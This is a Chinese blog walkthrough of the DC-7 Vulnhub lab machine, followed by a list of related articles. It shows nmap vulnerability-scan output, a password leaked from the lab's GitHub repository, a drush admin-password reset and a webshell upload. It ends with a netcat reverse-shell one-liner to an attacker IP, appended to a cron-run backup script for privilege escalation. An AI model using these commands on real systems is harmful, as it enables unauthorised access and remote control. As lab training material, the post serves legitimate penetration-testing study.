DC7靶场练习

最新推荐文章于 2024-07-23 14:28:09 发布
最新推荐文章于 2024-07-23 14:28:09 发布
阅读量141 收藏
点赞数
分类专栏: 靶场 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60848021/article/details/131422434
版权

一,靶场信息

二,信息搜集

1,确定目标IP

 

 

2,端口扫描

 

 

3,漏洞扫描

──(root💀kali)-[~]
└─# nmap --script=vuln -p 80,20 192.168.86.161
Starting Nmap 7.91 ( https://nmap.org ) at 2023-06-27 05:49 EDT
Nmap scan report for 192.168.86.161 (192.168.86.161)
Host is up (0.00021s latency).

PORT   STATE  SERVICE
20/tcp closed ftp-data
80/tcp open   http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.86.161
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.86.161:80/
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|     
|     Path: http://192.168.86.161:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/node/1
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|     
|     Path: http://192.168.86.161:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|     
|     Path: http://192.168.86.161:80/user/password
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/search/node/help
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/node/
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.86.161:80/search/node/
|     Form id: search-form
|     Form action: /search/node/
|     
|     Path: http://192.168.86.161:80/search/node/
|     Form id: search-block-form
|_    Form action: /search/node
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /INSTALL.txt: Drupal file
|   /: Drupal version 8 
|_  /README.txt: Interesting, a readme.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:F0:0B:DB (VMware)

Nmap done: 1 IP address (1 host up) scanned in 67.97 seconds

4,访问网站页面

三,渗透过程 

 

思路:最下面有个@DC7USER,这应该是网站的作者,在github上搜索下试试。

 

下载文件包,在config.php文件中找到了一个用户名和密码

 用户名:dc7user

 密码:MdR3xOgB7#dW

 登录不上去,说明不是登录用户和密码,有可能是SSH远程连接账号和密码。

 

 

 

百度查询drush

 

可以利用drush命令更改用户密码,drupal网站默认有一个用户是admin.

 

drush user-password admin --password="admin"

 上传一句话木马

 

 

 

 

 

 

 

上传木马成功

 

进行反弹shell并进行交互式shell.

 

四,提权 

 /opt/scripts目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件定时执行可以利用它来反弹shell

定时任务提权

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.86.130 7777 >/tmp/f" >> backups.sh

 

五,总结 

这个靶场大部分都是参考别人的,后期再重新过一遍吧。

一条贤鱼的学习站
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-4渗透靶机详解
weixin_51083551的博客
09-12 4067
萌新DC系列靶机渗透详解之 DC-4 “DC-3好难呜呜,先打DC-4” 1. 明确目标 获得靶机 root 权限,找到root账户下的 flag 2. 信息收集 使用 arp-scan 扫描网段下的主机 └─# arp-scan -l
端口扫描神器 - Nmap的基本使用
热门推荐
hackzkaq的博客
11-19 1万+
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 一、Nmap简介 Nmap是一款网络扫描和主机检测的非常有用的工具。 可以用于收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器。 主要功能有: 检测活在网络上的主机(主机发现) 检测主机上开放的端口(端口发现或枚举) 检测到相应的端口(服务发现)的软件和版本 检测操作系统,硬件地址,以及软件版本 检测脆弱性的漏洞(Nmap的脚本) 下载地址:https://nmap.org/download.html (也可文末扫码找助教领取安装
vulhub——Photographer:1
战神/calmness的博客
08-12 471
目录 信息收集 SMB共享服务 访问80端口 访问8000 端口 目录遍历 文件上传 提权 下载链接:https://download.vulnhub.com/photographer/Photographer.ova 信息收集 root@kali:~# nmap -sC 192.168.243.155 --script=vuln Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-11 22:37 EDT Nmap scan re
Cross-Site Request Forgery (CSRF)
zhigangsun的专栏
04-20 5255
Overview CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending
vulnstack(一) 红日靶场复现
BuNahua的博客
09-01 2736
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
vulnhub DC7 靶场练习
鸥鹭忘机
08-20 1740
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第7台,下载地址为https://www.vulnhub.com/entry/dc-7,356/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机中用暴力破解成功的概率非常小,我们需要开阔思路,寻找非技术上的方法。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 收集
vulnhub DC8 靶场练习
鸥鹭忘机
09-03 1096
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第8台,下载地址为https://www.vulnhub.com/entry/dc-8,367/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的总体难度不大,利用的漏洞也是常见的,只要细心观察就可以发现这个突破口。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。
vulnhub DC3 靶场练习
鸥鹭忘机
08-13 2222
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第三台,下载地址为https://www.vulnhub.com/entry/dc-32,312/。该靶机的难度系数为简单,该靶机只有一个flag,只有获取root权限才能获取该flag。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-3靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 然后需要溢出CD/DVD选项,这个启动时候会自动检测并
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
Sigrity 直流分析(PowerDC)操作练习
05-11
7. **PowerDC的主要功能**: - 支持前后仿真,为PCB或IC封装提供直流分析,帮助用户评估和优化设计。 - 可以直观地展示电压分布、电流分布和过孔电流,便于理解系统行为并进行问题定位。 - 提供Lumped to ...
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
vuInhub靶场实战系列-DC-7实战
05-30
vuInhub靶场实战系列-DC-7实战
客户端与服务器通讯详解(5):安全威胁与应对策略
贝格前端工场的博客
07-23 258
在进行客户端与服务器通讯的时候,要时刻防范安全威胁,后端有一句名言“永远不要相信用户在前端的输入”,就是说客户端和服务器之间通讯,必须有严密的规则。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 500
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 635
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 1111
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
自媒体创作、小说推文等网赚项目安全吗?网络兼职需要注意什么?
最新发布
2401_86131344的博客
07-23 109
综上所述,自媒体创作和小说推文等网赚项目在遵守相关规定和采取正确操作方式的前提下是安全的。- 在自媒体创作和小说推文的过程中,要严格遵守平台的相关规定和规则,避免违规行为导致账号被封禁或收益被扣除。自媒体创作和小说推文等网赚项目本身**可以**是安全的,但前提是要采取正确的操作方式和遵守相关规定。- 对于小说推文,要选择正规的小说平台进行合作,例如知乎、起点、飞卢等。
"PowerDC直流分析操作练习及重要性
Sigrity直流分析(PowerDC)是一种用于解决直流问题的工具,它对电路板和集成电路(IC)包的直流特性进行模拟和分析,以确保电路在正常工作时能正常供电。 在当前的系统设计中,核心供电电压越来越低,而总的工作...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值